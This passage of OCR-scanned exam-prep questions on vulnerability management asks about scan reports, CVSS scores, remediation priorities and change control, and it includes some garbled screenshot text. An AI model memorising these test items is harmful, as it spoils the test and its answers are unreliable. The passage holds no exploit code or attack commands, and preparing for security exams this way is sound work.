environment that found a number of vulnerabilities. Which vulnerabilities must he remedi- 
ate in order to have a “clean” scan under PCI DSS standards? 


A. Critical vulnerabilities 

B. Critical and high vulnerabilities 

C. Critical, high, and moderate vulnerabilities 

D. Critical, high, moderate, and low vulnerabilities 

Beth discovers the vulnerability shown here on several Windows systems in her organiza- 
tion. There is a patch available, but it requires compatibility testing that will take several 


days to complete. What type of file should Beth be watchful for because it may directly 
exploit this vulnerability? 


v BBM 4 Microsoft Windows PNG Processing Information Disclosure Vulnerability (MS15-024) 


First Detected: 09/28/2015 at 10:42:15 (GMT-0400) Last Detected: 04/04/2017 at 19:22:26 (GMT-0400) 
QID: 91026 CVSS Base: 4.3 
Category: Windows CVSS Temporal: 3.4 
CVE ID: CVE-2015-0080 CVSS3 Base: - 
Vendor Reference MS15-024 CVSS3 Temporal: 

Bugtraq ID: 72909 CVSS Environment: 

Service Modified: 03/11/2015 Asset Group: 

User Modified: - Collateral Damage Potential: 

Edited: No Target Distribution: 

PCI Vuln: Yes Confidentiality Requirement: 

Ticket State: Open Integrity Requirement: 


Availability Requirement: 


Private key files 
Word documents 


Image files 
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Encrypted files 


During a vulnerability scan, Patrick discovered that the configuration management agent 
installed on all of his organization’s Windows servers contains a serious vulnerability. The 
manufacturer is aware of this issue, and a patch is available. What process should Patrick 
follow to correct this issue? 


A. Immediately deploy the patch to all affected systems. 


B. Deploy the patch to a single production server for testing and then deploy to all 
servers if that test is successful. 


C. Deploy the patch in a test environment and then conduct a staged rollout in 
production. 


D. Disable all external access to systems until the patch is deployed. 


68. 


69. 


70. 


71. 
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Matthew is creating a new forum for system engineers from around his organization to 
discuss security configurations of their systems. What SCAP component can Matthew 
take advantage of to help administrators have a standard language for discussing configu- 
ration issues? 


A. CPE 
B. CVE 
C. CCE 
D. CVSS 


Aaron is configuring a vulnerability scan for a Class C network and is trying to choose a 
port setting from the list shown here. He would like to choose a scan option that will effi- 
ciently scan his network but also complete in a reasonable period of time. Which setting 
would be most appropriate? 


© None 
Full 
Standard Scan (about 1900 ports) [B View list 
Light Scan (about 160 ports) [8 View list 
Additional 





(ex: 1-1024, 8080) 


None 
Full 
Standard Scan 
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Light Scan 


Hunter discovered that a server in his organization has a critical web application vulner- 
ability and would like to review the logs. The server is running Apache on CentOS with a 
default configuration. What is the name of the file where Hunter would expect to find 
the logs? 


A. httpd_log 

B. apache_log 

C. access_log 

D. http_log 

Ken is reviewing the results of a vulnerability scan, shown here, from a web server in 
his organization. Access to this server is restricted at the firewall so that it may not 


be accessed on port 80 or 443. Which of the following vulnerabilities should Ken still 
address? 


w Vulnerabilities (6) HE 
> EEHEHN 5 EOL/Obsolete Software: OpenSSL 0.9.8/1.0.0 Detected 


> Ba 3 Apache HTTP Server HttpOnly Cookie Information Disclosure Vulnerability 

> Baa 3 HTTP TRACE / TRACK Methods Enabled 

> a 2 Web Server HTTP Trace/Track Method Support Cross-Site Tracing Vulnerability 
> 1 Apache Web Server ETag Header Information Disclosure Weakness 

> E 1 Presence of a Load-Balancing Device Detected 
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OpenSSL version 
Cookie information disclosure 
TRACK/TRACE methods 


Ken does not need to address any of these vulnerabilities because they are not exposed 
to the outside world 
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Brian is considering the use of several different categories of vulnerability plug-ins. Of the 
types listed here, which is the most likely to result in false positive reports? 


A. Registry inspection 

B. Banner grabbing 

C. Service interrogation 

D. Fuzzing 

Rob conducts a vulnerability scan and finds three different vulnerabilities, with the CVSS 


scores shown here. Which vulnerability should be his highest priority to fix, assuming all 
three fixes are of equal difficulty? 


Vulnerability 1 
CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N 


Vulnerability 2 
CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C 


Vulnerability 3 
CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N 


Vulnerability 1 
Vulnerability 2 
Vulnerability 3 
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Vulnerabilities 1 and 3 are equal in priority. 

Which one of the following is not an appropriate criteria to use when prioritizing the 
remediation of vulnerabilities? 

A. Network exposure of the affected system 

B. Difficulty of remediation 

C. Severity of the vulnerability 

D. All of these are appropriate. 

Landon is preparing to run a vulnerability scan of a dedicated Apache server that his orga- 


nization is planning to move into a DMZ. Which one of the following vulnerability scans 
is least likely to provide informative results? 


A. Web application vulnerability scan 
B. Database vulnerability scan 

C. Port scan 
D 


Network vulnerability scan 
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76. Ken recently received the vulnerability report shown here that affects a file server used by 
his organization. What is the primary nature of the risk introduced by this vulnerability? 


v Ba 3 NetBIOS Name Conflict Vulnerability 


First Detected: 02/04/2017 at 21:06:51 (GMT-0400) Last Detected: 04/04/2017 at 21:22:12 (GMT-0400) 
QID: 70008 CVSS Base: 5 
Category: SMB / NETBIOS CVSS Temporal: 4.1 
CVE ID: CVE-2000-0673 CVSS3 Base: - 
Vendor Reference MS00-047 CVSS3 Temporal: : 
Bugtraq ID: 1514, 1515 CVSS Environment: 

Service Modified: 03/17/2009 Asset Group: - 
User Modified: - Collateral Damage Potential: - 
Edited: No Target Distribution: - 
PCI Vuln: Yes Confidentiality Requirement: - 
Ticket State: Integrity Requirement: - 


Availability Requirement: - 


THREAT: 

A malicious user can send a NetBIOS Name Conflict message to the NetBIOS name service even when the receiving 
machine is not in the process of registering its NetBIOS name. As a result, the target will not attempt to use that name 
in any future network connection attempts, which could lead to intermittent connectivity problems, or the loss of all 
NetBIOS functionality. 

This is a design flaw problem in the NetBIOS protocol and the WINS dynamic name registration, which is present 
whenever WINS is supported. 


IMPACT: 

If successfully exploited, this vulnerability could lead to intermittent connectivity problems, or the loss of all NetBIOS 
functionality. 

SOLUTION: 

The best workaround for Microsoft Windows and Samba Server is to block all incoming traffic from the Internet to UDP 
ports 137 and 138. 

For Windows platforms, microsoft has released some patches to address this issue. 

Microsoft has released a patch (Hotfix 269239). After the patch is applied, conflict messages will only be responded to 
during the initial name registration process. For more information on this vulnerability and the patch, read 

Mi ft rity Bulletin (MS00-047). 

Hotfix 269239 mitigates the issue by generating log events for detected name conflicts. Note that while Hotfix 269239 
provides notification when name conflicts occur, the system remains vulnerable. Microsoft acknowledges this problem 
in their documentation for Hotfix 269239. 

The following is a list of Microsoft patches: 

Microsoft Windows NT 4.0 patch Q269239i 

Mi ft Wi NT Terminal r i 

Mi ft Wi t 239 W2K SP2 x n 

For Samba there are no vendor supplied patches available at this time. 


A. Confidentiality 
B. Integrity 

C. Availability 

D. Nonrepudiation 


77. Molly is assessing the criticality of a vulnerability discovered on her organization’s net- 
work. It has the CVSS information shown here. What is the greatest risk exposed by this 
server? 


Risk Information 


Risk Factor: Medium 
CVSS Base Score: 5.0 


CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:N 
/V:P/A:N 


78. 


79. 


80. 
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A. Confidentiality 

B. Integrity 

C. Availability 

D. There is no risk associated with this vulnerability. 


Bill is creating a vulnerability management program for his company. He has limited scan- 
ning resources and would like to apply them to different systems based upon the sensitivity 
and criticality of the information that they handle. What criteria should Bill use to deter- 
mine the vulnerability scanning frequency? 


A. Data remnance 

B. Data privacy 

C. Data classification 

D. Data privacy 

Tom recently read a media report about a ransomware outbreak that was spreading rapidly 
across the Internet by exploiting a zero-day vulnerability in Microsoft Windows. As part 
of a comprehensive response, he would like to include a control that would allow his orga- 


nization to effectively recover from a ransomware infection. Which one of the following 
controls would best achieve Tom’s objective? 


A. Security patching 

B. Host firewalls 

C. Backups 

D. Intrusion prevention systems 


Kaitlyn discovered the vulnerability shown here on a workstation in her organization. 
Which one of the following is not an acceptable method for remediating this vulnerability? 


v BG 3 WinRAR Insecure Executable Loading Remote Code Execution Vulnerability 


First Detected: 12/04/2016 at 19:06:20 (GMT-0400) Last Detected: 04/04/2017 at 20:54:02 (GMT-0400) 
QID: 370233 CVSS Base: 3.7 
Category: Local CVSS Temporal: 3.1 
CVE ID: CVE-2015-5663 CVSS3 Base: - 
Vendor Reference - CVSS3 Temporal: 

Bugtraq ID: 79666 CVSS Environment: 

Service Modified: 11/28/2016 Asset Group: 

User Modified: - Collateral Damage Potential: 

Edited: No Target Distribution: 

PCI Vuln: No Confidentiality Requirement: 

Ticket State: Integrity Requirement: 


Availability Requirement: 


THREAT: 

WinRAR is a shareware file archiver and compressor utility for Windows. It can create archives in RAR or ZIP file formats 
and unpack numerous archive file formats. The file-execution functionality in WinRAR allows local users to escalate 
privileges via a Trojan horse file with a name similar to an extensionless filename. 

Affected Versions: 

WinRAR prior to 5.30 Beta 5 
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A. Upgrade WinRAR. 
B. Upgrade Windows. 
C. Remove WinRAR. 
D. Replace WinRAR with an alternate compression utility. 


Brent ran a vulnerability scan of several network infrastructure devices on his network 
and obtained the result shown here. What is the extent of the impact that an attacker 
could have by exploiting this vulnerability directly? 


v EEE 3 Readable SNMP Information 


First Detected: 07/16/2014 at 20:06:22 (GMT-0400) Last Detected: 04/05/2017 at 04:15:02 (GMT-0400) 
QID: 78030 CVSS Base: 10 
Category: SNMP CVSS Temporal: 9 
CVE ID: CVE-1999-0517 CVE-1999-0186 CVE- CVSS3 Base: - 
1999-0254 CVE-1999-0516 CVE-1999.- CVSS3 Temporal: 
0472 CVE-2001-0514 CVE-2002-0109 CVSS Environment: 
Vendor Reference’ - Asset Group: 
Bugtraq ID: 3797, 2896, 3795 Collateral Damage Potential: 
Service Modified: 05/22/2012 Target Distribution: 
User Modified: - Confidentiality Requirement: 
Edited: No Integrity Requirement: 
PCI Vuln: Yes Availability Requirement: 
Ticket State: 
THREAT: 


Unauthorized users can read all SNMP information because the access password is not secure. 


Denial of service 
Theft of sensitive information 


Network eavesdropping 


Ipwp 


Reconnaissance 


Ted runs the cybersecurity vulnerability management program for his organization. He 
sends a database administrator a report of a missing database patch that corrects a high 
severity security issue. The DBA writes back to Ted that he has applied the patch. Ted 
reruns the scan, and it still reports the same vulnerability. What should Ted do next? 


A. Mark the vulnerability as a false positive. 

B. Ask the DBA to recheck the database. 

C. Mark the vulnerability as an exception. 

D. Escalate the issue to the DBA’s manager. 

Miranda is reviewing the results of a vulnerability scan and identifies the issue shown here 
in one of her systems. She consults with developers who check the code and assure her 


that it is not vulnerable to SQL injection attacks. An independent auditor confirms this for 
Miranda. What is the most likely scenario? 
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CGI Generic SQL Injection (blind, time based) > 


Description 


By sending specially crafted parameters to one or more CGI scripts hosted on the remote web server, Nessus was able to get a slower 
response, which suggests that it may have been able to modify the behavior of the application and directly access the underlying database. 


An attacker may be able to exploit this issue to bypass authentication, read confidential data, modify the remote database, or even take 
control of the remote operating system. 


Note that this script is experimental and may be prone to false positives. 


Solution 


Modify the affected CGI scripts so that they properly escape arguments. 


This is a false positive report. 
The developers are wrong, and the vulnerability exists. 


The scanner is malfunctioning. 
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The database server is misconfigured. 


Eric is reviewing the results of a vulnerability scan and comes across the vulnerability 
report shown here. Which one of the following services is least likely to be affected by this 
vulnerability? 


v EE 2 X.509 Certificate MD5 Signature Collision Vulnerability 
First Detected: 12/11/2013 at 22:38:17 (GMT-0400) Last Detected: 03/05/2017 at 03:35:56 (GMT-0400) 
QID: 42012 CVSS Base: 5 
Category: General remote services CVSS Temporal: 4.3 
CVE ID: CVE-2004-2761 CVSS3 Base: - 
Vendor Reference - CVSS3 Temporal: - 
Bugtraq ID: 33065 CVSS Environment: 
Service Modified: 09/17/2009 Asset Group: - 
User Modified: - Collateral Damage Potential: - 
Edited: No Target Distribution: - 
PCI Vuln: Yes Confidentiality Requirement: - 
Ticket State: Integrity Requirement: - 


Availability Requirement: - 


THREAT: 

Hash algorithms are used to generate a hash value for a message (an arbitrary block of data) such that a number of 
cryptographic properties hold. In particular it is expected to be resistant to collisions, that is that given a message m, 
it is difficult to compute a second message m' such that both have the same hash value. 


A. HTTPS 
B. HTTP 
C. SSH 

D. VPN 
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Questions 85 and 86 refer to the following scenario: 
Larry recently discovered a critical vulnerability in one of his organization’s database serv- 
ers during a routine vulnerability scan. When he showed the report to a database admin- 
istrator, the administrator responded that they had corrected the vulnerability by using a 
vendor-supplied workaround because upgrading the database would disrupt an important 
process. Larry verified that the workaround is in place and corrects the vulnerability. 

85. How should Larry respond to this situation? 
A. Mark the report as a false positive. 
B. Insist that the administrator apply the vendor patch. 
C. Mark the report as an exception. 
D. Require that the administrator submit a report describing the workaround after each 

vulnerability scan. 

86. What is the most likely cause of this report? 
A. The vulnerability scanner requires an update. 
B. The vulnerability scanner depends upon version detection. 
C. The database administrator incorrectly applied the workaround. 
D. Larry misconfigured the scan. 


87. Breanne ran a vulnerability scan of a server in her organization and found the vulnerabil- 
ity shown here. What is the use of the service affected by this vulnerability? 


POPS Cleartext Logins Permitted Plugin Details 

Severity: Low 
Description 

ID: 15855 
The remote host is running a POP3 daemon that allows cleartext logins over unencrypted connections. Version: $Revision: 1.20 $ 


An attacker can uncover user names and passwords by sniffing traffic to the POP3 daemon if a less 


Type: remote 
secure authentication mechanism (eg, USER command, AUTH PLAIN, AUTH LOGIN) is used. ; 

Family: Misc. 

Published: 2004/11/30 
Solution Modified: 2015/06/23 


Contact your vendor for a fix or encrypt traffic with SSL / TLS using stunnel. 


Risk Information 


See Also Risk Factor: Low 

http://tools.ietf.org/html/rfic2222 CVSS Base Score: 2.6 

http://tools.ietf.org/html/rfc2595 CVSS Vector: CVSS2#AV:N/AC:H/Au:N/C:P 
JVN/A:N 

Output 


The following cleartext methods are supported : 
USER 
SASL PLAIN LOGIN 


Port » Hosts 


110 / tcp / pops 
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Web server 
Database server 
Email server 


Directory server 


Margot discovered that a server in her organization has a SQL injection vulnerability. She 
would like to investigate whether attackers have attempted to exploit this vulnerability. 
Which one of the following data sources is least likely to provide helpful information? 


A. 
B. 
C. 
D. 


Netflow logs 
Web server logs 
Database logs 
IDS logs 


Krista is reviewing a vulnerability scan report and comes across the vulnerability shown 
here. She comes from a Linux background and is not as familiar with Windows adminis- 
tration. She is not familiar with the runas command mentioned in this vulnerability. What 
is the closest Linux equivalent command? 
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v Be 3 Microsoft Windows “RunAs" Password Length Local Information Disclosure - Zero Day 


First Detected: 08/04/2015 at 18:02:25 (GMT-0400) Last Detected: 04/05/2017 at 02:19:36 (GMT-0400) 
QID: 116157 CVSS Base: < 
Category: Local CVSS Temporal: 3.4 
CVE ID: VE-2009-0320 CVSS3 Base: - 
Vendor Reference - CVSS3 Temporal: 

Bugtraq ID: 33440 CVSS Environment: 

Service Modified: 09/04/2009 Asset Group: 

User Modified: - Collateral Damage Potential: 

Edited: No Target Distribution: 

PCI Vuln: Yes Confidentiality Requirement: 

Ticket State: Integrity Requirement: 


Availability Requirement: 


THREAT: 

RunAs is a service component for Windows, which can be used to execute a second application as a different user, 
generally for performing privileged operations. 

RunAs is prone to a local password disclosure vulnerability that allows a malicious user to guess the password length 
when “runas.exe" is used to launch an application under another's user's privilege. When the application prompts the 
current user for the password of the specified user, a local attacker can monitor the "I/O Other Bytes” performance of 
the application to determine the length of the submitted password. 


sudo 
grep 
SU 


ps 
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90. After scanning a web application for possible vulnerabilities, Barry received the result shown 
here. Which one of the following best describes the threat posed by this vulnerability? 


~ Vulnerabilities (1) AE 
v EEE 3 Web Server Uses Plain-Text Form Based Authentication 


First Detected: 08/03/2014 at 12:02:19 (GMT-0400) Last Detected: 04/09/2017 at 20:31:35 (GMT-0400) 
QID: 86728 CVSS Base: sW 
Category: Web server CVSS Temporal: 3.6 
CVE ID: - CVSS3 Base: - 
Vendor Reference - CVSS3 Temporal: 

Bugtraq ID: - CVSS Environment: 

Service Modified: 09/04/2016 Asset Group: 

User Modified: - Collateral Damage Potential: 

Edited: No Target Distribution: 

PCI Vuln: Yes Confidentiality Requirement: 

Ticket State: Integrity Requirement: 


Availability Requirement: 


An attacker can eavesdrop on authentication exchanges. 
An attacker can cause a denial-of-service attack on the web application. 


An attacker can disrupt the encryption mechanism used by this server. 
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An attacker can edit the application code running on this server. 


91. Michelle would like to share information about vulnerabilities with partner organizations 
who use different vulnerability scanning products. What component of SCAP can best assist 
her in ensuring that the different organizations are talking about the same vulnerabilities? 


A. CPE 
B. CVE 
C. CVSS 
D. OVAL 


92. Javier ran a vulnerability scan of a network device used by his organization and discovered 
the vulnerability shown here. What type of attack would this vulnerability enable? 


v Ba 2 UDP Constant IP Identification Field Fingerprinting Vulnerability 
First Detected: 03/17/2012 at 01:33:14 (GMT-0400) Last Detected: 04/05/2017 at 01:57:57 (GMT-0400) 
11/02/2012 at 07:00:06 (GMT-0400) 
QID: 82024 CVSS Base: 
Category: TCP/IP , 
CVE ID: CVE-2002-0510 COSS mee 
CVSS Environment: 
Vendor Reference 
Bugtraq ID: 4314 Asset Group: 
Service Modified: 05/07/2008 Collateral Damage Potential: 
Target Distribution: 
User Modified: 
Edited: No Confidentiality Requirement: 
: Integrity Requirement: 
POUAS ne Availability Requirement: 
Ticket State: seine SORER 


THREAT: 

The host transmits UDP packets with a constant IP Identification field. This behavior may be exploited to discover 
the operating system and approximate kernel version of the vulnerable system. Normally, the IP Identification 

field is intended to be a reasonably unique value, and is used to reconstruct fragmented packets. It has been 
reported that in some versions of the Linux kernel IP stack implementation as well as other operating systems, UDP 
packets are transmitted with a constant IP Identification field of 0. 


A. Denial of service 


B. Information theft 
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C. Information alteration 
D. Reconnaissance 
93. Amanda scans a Windows server in her organization and finds that it has multiple critical 


vulnerabilities, detailed in the report shown here. What action can Amanda take that will 
have the most significant impact on these issues without creating a long-term outage? 


w 172.19.. _ = cee D We Windows Server 2008 R2 Enterprise 64 bit Edition Service Pack 1 
w Vulnerabilities (27) H E 


> MMMM 5 Microsoft Cumulative Security Update for Internet Explorer (MS17-006) CVSS: - CVSS3:- New [dv] 
> MEM 5 Microsoft Cumulative Security Update for Windows (MS17-012) CVSS: - CVSS3:- New +) 
> BM 4 aa Uniscribe Multiple Remote Code Execution and Information Disclosure Vulnerabilities (MS17- CVSS: - CVSS3: - New [+] 
> WEEN | 4 Microsoft Security Update for Windows Kernel-Mode Drivers (MS17-018) CVSS: - CVSS3:- New [+ 
> EEEH | 4 Microsoft Windows DirectShow Information Disclosure Vulnerability (MS17-021) CVSS: - CVSS3:- New ($~) 
> EEEH |4 Microsoft XML Core Services Information Disclosure Vulnerability (MS17-022) CVSS: - CVSS3:- New +) 
> EEEH | 4 Microsoft Windows Kernel Elevation of Privileges (MS17-017) CVSS: - CVSS3:- New +) 
> Ba 3 Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) port 3389/tcp over SSL CVSS: - CVSS3:- New +) 
> EEHHEHN 5 Veritas NetBackup Remote Access Vulnerabilities (VTS16-001) CVSS: - CVSS3:- Active [d~] 
> MMMM 5 EOL/Obsolete Software: Microsoft VC++ 2005 Detected CVSS: - CVSS3:- Active [$7] 
> MEM 5 Microsoft Foundation Class Library Remote Code Execution Vulnerability (MS11-025) CVSS: - CVSS3:- Active [$v 
> EEEH | 4 Microsoft Windows Graphics Component Multiple Vulnerabilites (MS17-013) CVSS: - CVSS3:- Active [d~] 
>» BEG 3 Microsoft Windows “RunAs" Password Length Local Information Disclosure - Zero Day CVSS: - CVSS3: - Active +) 
> Baa 3 Built-in Guest Account Not Renamed at Windows Target System CVSS: - CVSS3:- Active [d~] 
> Be 3 Windows Unquoted/Trusted Service Paths Privilege Escalation Security Issue CVSS: - CVSS3: - Active [$v] 
> Bae 3 Microsoft .Net Framework RC4 in TLS Not Disabled (KB2960358) CVSS: - CVSS3: - Active +) 





A. Configure the host firewall to block inbound connections. 
B. Apply security patches. 
C. Disable the guest account on the server. 
D. Configure the server to only use secure ciphers. 
94. Ben is preparing to conduct a vulnerability scan for a new client of his security consulting 
organization. Which one of the following steps should Ben perform first? 
A. Conduct penetration testing. 
B. Runa vulnerability evaluation scan. 
C. Runa discovery scan. 
D. Obtain permission for the scans. 
95. Katherine coordinates the remediation of security vulnerabilities in her organization and is 
attempting to work with a system engineer on the patching of a server to correct a moder- 
ate impact vulnerability. The engineer is refusing to patch the server because of the poten- 


tial interruption to a critical business process that runs on the server. What would be the 
most reasonable course of action for Katherine to take? 


A. Schedule the patching to occur during a regular maintenance cycle. 

B. Exempt the server from patching because of the critical business impact. 

C. Demand that the server be patched immediately to correct the vulnerability. 
D 


Inform the engineer that if he does not apply the patch within a week that Katherine 
will file a complaint with his manager. 
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96. During a recent vulnerability scan of workstations on her network, Andrea discovered the 
vulnerability shown here. Which one of the following actions is least likely to remediate 
this vulnerability? 


v BM 4 Sun Java RunTime Environment GIF Images Buffer Overflow Vulnerability 


First Detected: 08/04/2015 at 18:02:25 (GMT-0400) Last Detected: 04/05/2017 at 03:40:45 (GMT-0400) 
QID: 115501 CVSS Base: 6.8 
Category: Local CVSS Temporal: 5.3 
CVE ID: CVE-2007-0243 CVSS3 Base: - 
Vendor Reference r: 1D 1 41 CVSS3 Temporal: 

Bugtraq ID: 22085 CVSS Environment: 

Service Modified: 10/21/2009 Asset Group: - 
User Modified: - Collateral Damage Potential: - 
Edited: No Target Distribution: - 
PCI Vuln: Yes Confidentiality Requirement: 

Ticket State: Open Integrity Requirement: 


Availability Requirement: 


THREAT: 

The Java Runtime Environment is an application that allows users to run Java applications. 

The Java Runtime Environment is prone to a buffer overflow vulnerability because the application fails to bounds check 
user-supplied data before copying it into an insufficiently sized memory buffer. Specifically, the vulnerability exists when 
the application processes a GIF image from a Java applet. 


IMPACT: 
A attacker can exploit this issue to execute arbitrary code with the privileges of the victim. 


SOLUTION: 

This issue is addressed in the following releases (for Windows, Solaris, and Linux): 
JDK and JRE 5.0 Update 10 or later 

SDK and JRE 1.4.2_13 or later 

SDK and JRE 1.3.1_19 or later 

J2SE 5.0 is available for download at JOK Downloads. 

J2SE 5.0 Update 10 for Solaris is available in the following patches: 
J2SE 5.0: update 10 (as delivered in patch 118666-10) 

J2SE 5.0: update 10 (as delivered in patch 118667-10 (64bit)) 
J2SE 5.0_x86: update 10 (as delivered in patch 118668-10) 

J2SE 5.0_x86: update 10 (as delivered in patch 118669-10 (64bit)) 
J2SE 1.4.2 is available for download at J2SE 1.4.2. 

J2SE 1.3.1 is available for download at J2SE 1.3. 


Refer to Oracle ID 1000058 .1 for additional information on the vulnerabilities and patch details. 
Patch: 
Following are links for downloading patches to fix the vulnerabilities: 

n Alert ID 102760: all (J2SE 5. 

n Alert ID 102760: all 1.4. 

n Alert ID 102760: all 1.3.1 

n Alert ID 102760: ri 


Remove JRE from workstations. 
Upgrade JRE to the most recent version. 


Block inbound connections on port 80 using the host firewall. 
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Use a web content filtering system to scan for malicious traffic. 


97. Grace ran a vulnerability scan and detected an urgent vulnerability in a public-facing web 
server. This vulnerability is easily exploitable and could result in the complete compromise 
of the server. Grace wants to follow best practices regarding change control while also 
mitigating this threat as quickly as possible. What would be Grace’s best course of action? 


A. Initiate a high-priority change through her organization’s change management process 
and wait for the change to be approved. 


B. Implement a fix immediately and document the change after the fact. 
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C. 
D. 


Schedule a change for the next quarterly patch cycle. 


Initiate a standard change through her organization’s change management process. 


98. Doug is preparing an RFP for a vulnerability scanner for his organization. He needs to 
know the number of systems on his network to help determine the scanner requirements. 
Which one of the following would not be an easy way to obtain this information? 


A. ARP tables 
B. Asset management tool 
C. Discovery scan 


D. 


Results of scans recently run by a consultant 


99. 


Mary runs a vulnerability scan of her entire organization and shares the report with 
another analyst on her team. An excerpt from that report appears here. Her colleague 
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points out that the report contains only vulnerabilities with severities of 3, 4, or 5. What is 


the most likely cause of this result? 


y E E 5 5S OSS Ss oS 


~ Vulnerabilities (7) HE 

3 Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) 
3 SSL/TLS use of weak RC4 cipher 

3 SSLv3 Padding Oracle Attack Information Disclosure Vulnerability (POODLE) 

3 SSLv3.0/TLSv1.0 Protocol Weak CBC Mode Server Side Vulnerability (BEAST) 
3 SSL/TLS Server supports TLSv1.0 

3 SSL Server Has SSLv3 Enabled Vulnerability 

3 HTTP TRACE / TRACK Methods Enabled 


v YV YV YV wV vw Ww 


v E M E TEME ME =€ E m 


wv Vulnerabilities (7) HE 


> EEE 3 Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) 
> EEE 3 SSL Server Has SSLv3 Enabled Vulnerability 

> BEE 3 SSL/TLS use of weak RC4 cipher 

> EEE 3 SSLv3.0/TLSv1.0 Protocol Weak CBC Mode Server Side Vulnerability (BEAST) 
> Ba 3 SSLv3 Padding Oracle Attack Information Disclosure Vulnerability (POODLE) 

> Baa 3 SSL/TLS Server supports TLSv1.0 

> Ba 3 HTTP TRACE / TRACK Methods Enabled 


Ven a Se oO 
wv Vulnerabilities (1) AE 
> HE 3 Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) 


v E ee SES 8S 


w Vulnerabilities (4) HE 


> BEG 3 Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) 
> Baa 3 Windows Remote Desktop Protocol Weak Encryption Method Allowed 

> Ba 3 SSL/TLS Server supports TLSv1.0 

> Ba 3 SSL/TLS use of weak RC4 cipher 


v SESS 8 ES 8 PSs 


wv Vulnerabilities (3) HE 


> Baa 3 SSL/TLS use of weak RC4 cipher 
> HE 3 SSLv3.0/TLSv1.0 Protocol Weak CBC Mode Server Side Vulnerability (BEAST) 
> BEG 3 SSL/TLS Server supports TLSv1.0 


port 443/tcp over SSL CVSS: - 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 


port 443/tcp over SSL 
port 443/tcp over SSL 
port 443/tcp over SSL 
port 443/tcp over SSL 
port 443/tcp over SSL 

port 443/tcp 


port 443/tcp over SSL CVSS: - 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 


port 443/tcp over SSL 
port 443/tcp over SSL 
port 443/tcp over SSL 
port 443/tcp over SSL 
port 443/tcp over SSL 

port 443/tcp 


CVSS3: 


CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 


CVSS3: 


CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 


Active 
Active 
Active 
Active 
Active 
Active 


Active 
Active 
Active 
Active 
Active 
Active 





tified 


v 


teede ee 





Ubuntu / Tiny Core Linux / Linux 2.6.x 


Ubuntu / Tiny Core Linux / Linux 2.6.x 


Ubuntu / Fedora / Tiny Core Linux / Linux 3.x 


port 443/tcp over SSL CVSS: - 


port 3389/tcp over SSL CVSS: - 


port 3389/tcp over SSL CVSS: - 


port 3389/tcp over SSL CVSS: - 
port 3389/tcp over SSL CVSS: - 


CVSS3: - Fixed 
Windows 2012 Standard 
CVSS3: - New 
CVSS3: - Active 
CVSS3: - Active 
CVSS3: - Active 


Ubuntu / Fedora / Tiny Core Linux / Linux 3.x 


port 443/tcp over SSL CVSS: - CVSS3: - Fixed 


port 443/tcp over SSL CVSS: - CVSS3: - Fixed 
port 443/tcp over SSL CVSS: - CVSS3: - Fixed 
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The scan sensitivity is set to exclude low-importance vulnerabilities. 
Mary did not configure the scan properly. 
Systems in the data center do not contain any level 1 or 2 vulnerabilities. 


The scan sensitivity is set to exclude high-impact vulnerabilities. 


100. James is reviewing the vulnerability shown here, which was detected on several servers in 
his environment. What action should James take? 


OE TCP/IP Timestamps Supported Plugin Details 
> Severity: Info 
Description 
ID: 25220 
The remote host implements TCP timestamps, as defined by RFC1323. A side effect of this feature is that Version: 1.19 
the uptime of the remote host can sometimes be computed. ; 
Type: remote 
Family: General 
See Also Published: 2007/05/16 
Modified: 2011/03/20 


http://www. ietf.org/ric/ric1 323. txt 
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Block TCP/IP access to these servers from external sources. 
Upgrade the operating system on these servers. 
Encrypt all access to these servers. 


No action Is necessary. 


101. Which one of the following approaches provides the most current and accurate 
information about vulnerabilities present on a system because of the misconfiguration 
of operating system settings? 


A. 
B. 
C. 
D. 


On-demand vulnerability scanning 
Continuous vulnerability scanning 
Scheduled vulnerability scanning 


Agent-based monitoring 


Questions 102 through 104 refer to the following scenario: 


Pete recently conducted a broad vulnerability scan of all the servers and workstations in 
his environment. He scanned the following three networks: 


DMZ network that contains servers with public exposure 


Workstation network that contains workstations that are allowed outbound 
access only 


Internal server network that contains servers exposed only to internal systems 


102. 


103. 


104. 
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He detected the following vulnerabilities: 


= Vulnerability 1: A SQL injection vulnerability on a DMZ server that would grant 
access to a database server on the internal network (severity 5/5) 


= Vulnerability 2: A buffer overflow vulnerability on a domain controller on the 
internal server network (severity 3/5) 


= Vulnerability 3: A missing security patch on several hundred Windows worksta- 
tions on the workstation network (severity 2/5) 


= Vulnerability 4: A denial-of-service vulnerability on a DMZ server that would 


allow an attacker to disrupt a public-facing website (severity 2/5) 


= Vulnerability 5: A denial of service vulnerability on an internal server that would 
allow an attacker to disrupt an internal website (severity 4/5) 


Note that the severity ratings assigned to these vulnerabilities are directly from the vulner- 
ability scanner and were not assigned by Pete. 

Absent any other information, which one of the vulnerabilities in the report should Pete 
remediate first? 

A. Vulnerability 1 

B. Vulnerability 2 

C. Vulnerability 3 

D. Vulnerability 4 


Pete is working with the desktop support manager to remediate vulnerability 3. What 
would be the most efficient way to correct this issue? 


A. Personally visit each workstation to remediate the vulnerability. 

B. Remotely connect to each workstation to remediate the vulnerability. 

C. Perform registry updates using a remote configuration tool. 

D. Apply the patch using a GPO. 

Pete recently conferred with the organization’s CISO, and the team is launching an initia- 
tive designed to combat the insider threat. They are particularly concerned about the theft 


of information by employees seeking to exceed their authorized access. Which one of the 
vulnerabilities in this report is of greatest concern given this priority? 


A. Vulnerability 2 
B. Vulnerability 3 
C. Vulnerability 4 
D. Vulnerability 5 
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105. Wanda recently discovered the vulnerability shown here on a Windows server in her orga- 
nization. She is unable to apply the patch to the server for six weeks because of operational 
issues. What workaround would be most effective in limiting the likelihood that this vul- 
nerability would be exploited? 


106. 
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v BM 4 Microsoft Windows Graphics Component Multiple Vuinerabilites (MS17-013) 


